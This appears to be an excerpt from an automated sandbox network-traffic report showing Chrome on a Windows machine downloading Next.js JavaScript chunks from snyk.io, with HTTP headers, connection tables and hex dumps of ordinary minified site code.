                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC14875INData Raw: 30 30 30 30 33 41 30 46 0d 0a 61 22 3a 22 68 74 74 70 3a 2f 2f 6a 73 6f 6e 2d 73 63 68 65 6d 61 2e 6f 72 67 2f 64 72 61 66 74 2d 30 37 2f 73 63 68 65 6d 61 23 22 7d 27 29 7d 2c 33 38 39 38 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 24 72 65 66 22 3a 22 23 2f 64 65 66 69 6e 69 74 69 6f 6e 73 2f 50 61 72 61 67 72 61 70 68 22 2c 22 64 65 66 69 6e 69 74 69 6f 6e 73 22 3a 7b 22 50 61 72 61 67 72 61 70 68 22 3a 7b 22 74 79 70 65 22 3a 22 6f 62 6a 65 63 74 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 6e 6f 64 65 54 79 70 65 22 3a 7b 22 74 79 70 65 22 3a 22 73 74 72 69 6e 67 22 2c 22 65 6e 75 6d 22 3a 5b 22 70 61 72 61 67 72 61 70 68 22 5d 7d 2c 22 64 61 74 61 22 3a 7b 22 74 79 70 65 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00003A0Fa":"http://json-schema.org/draft-07/schema#"}')},38986:function(e){e.exports=JSON.parse('{"$ref":"#/definitions/Paragraph","definitions":{"Paragraph":{"type":"object","properties":{"nodeType":{"type":"string","enum":["paragraph"]},"data":{"type"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              37192.168.2.54975523.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC516OUTGET /_next/static/chunks/2248-53c2c321360bf056.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="2248-53c2c321360bf056.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"3ed1acb02510bd2361181841d4e25001"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:49 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/2248-53c2c321360bf056.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::xv5dq-1729257049168-c89f40fdd68f
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:00 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 24677
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799340.1f604a5
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC15651INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 32 34 38 5d 2c 7b 33 37 35 30 37 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6f 2c 65 29 7b 76 61 72 20 69 3d 7b 22 2e 2f 61 73 73 65 74 2d 68 79 70 65 72 6c 69 6e 6b 2e 6a 73 6f 6e 22 3a 32 35 39 39 34 2c 22 2e 2f 62 6c 6f 63 6b 71 75 6f 74 65 2e 6a 73 6f 6e 22 3a 36 32 35 35 39 2c 22 2e 2f 64 6f 63 75 6d 65 6e 74 2e 6a 73 6f 6e 22 3a 35 31 37 33 34 2c 22 2e 2f 65 6d 62 65 64 64 65 64 2d 61 73 73 65 74 2d 62 6c 6f 63 6b 2e 6a 73 6f 6e 22 3a 31 32 32 30 2c 22 2e 2f 65 6d 62 65 64 64 65 64 2d 65 6e 74 72 79 2d 62 6c 6f 63 6b 2e 6a 73 6f 6e 22 3a 37 32 32 35 38 2c 22 2e 2f 65 6d 62 65 64 64 65
                                                                                                                                                                                                                                                                                                              Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2248],{37507:function(l,o,e){var i={"./asset-hyperlink.json":25994,"./blockquote.json":62559,"./document.json":51734,"./embedded-asset-block.json":1220,"./embedded-entry-block.json":72258,"./embedde
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:01 UTC9026INData Raw: 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6f 6f 74 65 72 2d 6c 65 67 61 6c 2d 6c 69 6e 6b 73 22 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 4c 65 67 61 6c 20 4c 69 6e 6b 73 22 2c 63 68 69 6c 64 72 65 6e 3a 6e 75 6c 6c 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 6d 61 70 28 6c 3d 3e 28 30 2c 69 2e 6a 73 78 29 28 22 6c 69 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 22 61 22 2c 7b 68 72 65 66 3a 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 75 72 6c 2c 63 68 69 6c 64 72 65 6e 3a 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 6c 61 62 65 6c 7d 29 7d 2c 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 6c 61 62 65 6c 29 29 7d 29 5d 7d 29 5d 7d 29 7d 29 7d 45 2e 70 72 6f 70 54 79 70 65 73 3d 7b 63 6f 6c 75 6d 6e 73 3a 73 28 29 2e 61
                                                                                                                                                                                                                                                                                                              Data Ascii: ,{className:"footer-legal-links","aria-label":"Legal Links",children:null==d?void 0:d.map(l=>(0,i.jsx)("li",{children:(0,i.jsx)("a",{href:null==l?void 0:l.url,children:null==l?void 0:l.label})},null==l?void 0:l.label))})]})]})})}E.propTypes={columns:s().a


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              38192.168.2.54975823.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC375OUTGET /_next/static/chunks/9384.57f0a60a33b0d128.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="9384.57f0a60a33b0d128.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"76632caa03fb2384173175c4284d918f"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/9384.57f0a60a33b0d128.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::5r875-1729257060098-81864d34b630
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:00 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 2496
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799340.1091f4e
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC2496INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 33 38 34 5d 2c 7b 37 39 33 38 34 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 69 2c 64 29 7b 64 2e 72 28 69 29 3b 76 61 72 20 6f 3d 64 28 38 35 38 39 33 29 2c 76 3d 64 28 34 33 32 35 39 29 2c 75 3d 64 28 32 33 37 35 31 29 2c 6e 3d 64 28 38 32 34 31 29 2c 65 3d 64 28 37 34 31 32 39 29 2c 73 3d 64 28 38 36 39 34 33 29 3b 69 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 69 2c 64 2c 61 2c 74 2c 63 2c 72 2c 66 2c 6d 2c 67 2c 68 2c 70 2c 5f 2c 62 2c 6b 2c 79 2c 78 2c 4e 2c 43 2c 48 2c 71 2c 77 2c 42 2c 45 2c 47 2c 5a 2c 6a 2c 46 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9384],{79384:function(l,i,d){d.r(i);var o=d(85893),v=d(43259),u=d(23751),n=d(8241),e=d(74129),s=d(86943);i.default=function(l){var i,d,a,t,c,r,f,m,g,h,p,_,b,k,y,x,N,C,H,q,w,B,E,G,Z,j,F,


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              39192.168.2.54975723.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC375OUTGET /_next/static/chunks/5662.de65dddd439a4870.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="5662.de65dddd439a4870.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"1cccd9c8380e466698d1cbb982d779b5"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/5662.de65dddd439a4870.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::ltvgn-1729257060084-37dc25deaa70
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:00 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 6259
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799340.1091f4d
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC6259INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 36 36 32 5d 2c 7b 35 31 34 30 34 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 69 2c 65 29 7b 76 61 72 20 6e 2c 61 3b 6c 65 74 20 6f 3d 6e 75 6c 6c 3d 3d 3d 28 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 28 31 30 31 39 34 29 2e 72 24 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 6e 3d 61 2e 66 69 6c 74 65 72 28 6c 3d 3e 21 28 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 69 6e 63 6c 75 64 65 73 28 22 70 61 74 63 68 2d 22 29 29 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 6d 61 70
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5662],{51404:function(l,i,e){var n,a;let o=null===(a=Object.keys(e(10194).r$))||void 0===a?void 0:null===(n=a.filter(l=>!(null==l?void 0:l.includes("patch-"))))||void 0===n?void 0:n.map


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              40192.168.2.54975923.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC378OUTGET /_next/static/chunks/webpack-1e81cdc3aa31d741.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC738INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="webpack-1e81cdc3aa31d741.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"1fa7b981e586665b5650aac09848c9e4"
                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 17:43:38 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/webpack-1e81cdc3aa31d741.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::2rtgc-1729532618814-a55f0c2bd259
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:00 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 8928
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799340.1091f64
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:00 UTC8928INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 61 2c 64 2c 63 2c 66 2c 74 2c 62 2c 6e 2c 72 2c 6f 2c 69 3d 7b 7d 2c 75 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 76 61 72 20 61 3d 75 5b 65 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 61 29 72 65 74 75 72 6e 20 61 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 64 3d 75 5b 65 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 63 3d 21 30 3b 74 72 79 7b 69 5b 65 5d 2e 63 61 6c 6c 28 64 2e 65 78 70 6f 72 74 73 2c 64 2c 64 2e 65 78 70 6f 72 74 73 2c 73 29 2c 63 3d 21 31 7d 66 69 6e 61 6c 6c 79 7b 63 26 26 64 65 6c 65 74 65 20 75 5b 65 5d 7d 72 65 74 75 72 6e 20 64 2e 65 78 70 6f 72 74 73 7d 73 2e 6d 3d 69 2c 65 3d 5b 5d 2c 73 2e 4f 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 64
                                                                                                                                                                                                                                                                                                              Data Ascii: !function(){"use strict";var e,a,d,c,f,t,b,n,r,o,i={},u={};function s(e){var a=u[e];if(void 0!==a)return a.exports;var d=u[e]={exports:{}},c=!0;try{i[e].call(d.exports,d,d.exports,s),c=!1}finally{c&&delete u[e]}return d.exports}s.m=i,e=[],s.O=function(a,d


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              41192.168.2.54976023.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC516OUTGET /_next/static/chunks/9253-7607d51456dc87b7.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="9253-7607d51456dc87b7.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"cb1fbd4ea4275b0c84dd670691f52ca0"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/9253-7607d51456dc87b7.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::2j4l7-1729257050752-b7e4b0c67273
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:02 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 10517
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799342.1f60671
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC10517INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 32 35 33 5d 2c 7b 32 34 38 38 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6c 2c 6e 29 7b 6e 2e 64 28 6c 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 6c 65 74 7b 75 72 6c 3a 6c 3d 22 2f 22 2c 6c 6f 63 61 6c 65 3a 6e 3d 22 22 2c 62 61 73 65 50 61 74 68 3a 69 3d 22 22 2c 73 6c 75 67 3a 64 3d 22 22 7d 3d 65 3b 72 65 74 75 72 6e 5b 6c 2c 22 65 6e 2d 55 53 22 3d 3d 3d 6e 3f 6e 75 6c 6c 3a 6e 2c 69 2c 64 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 2f 7c 5c 2f 24 2f 67 2c 22 22 29 5d 2e 66
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9253],{24881:function(e,l,n){n.d(l,{Z:function(){return i}});function i(e){let{url:l="/",locale:n="",basePath:i="",slug:d=""}=e;return[l,"en-US"===n?null:n,i,d.replace(/^\/|\/$/g,"")].f


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              42192.168.2.54976223.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC523OUTGET /_next/static/chunks/pages/index-e37833ce18fb9437.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:02 UTC740INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="index-e37833ce18fb9437.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"bdc1b111b7e9cc4aea2860b03e1808d6"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:51 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/pages/index-e37833ce18fb9437.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::45xtq-1729257050870-209ca7e6c031
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:02 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 4856
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799342.1f60621
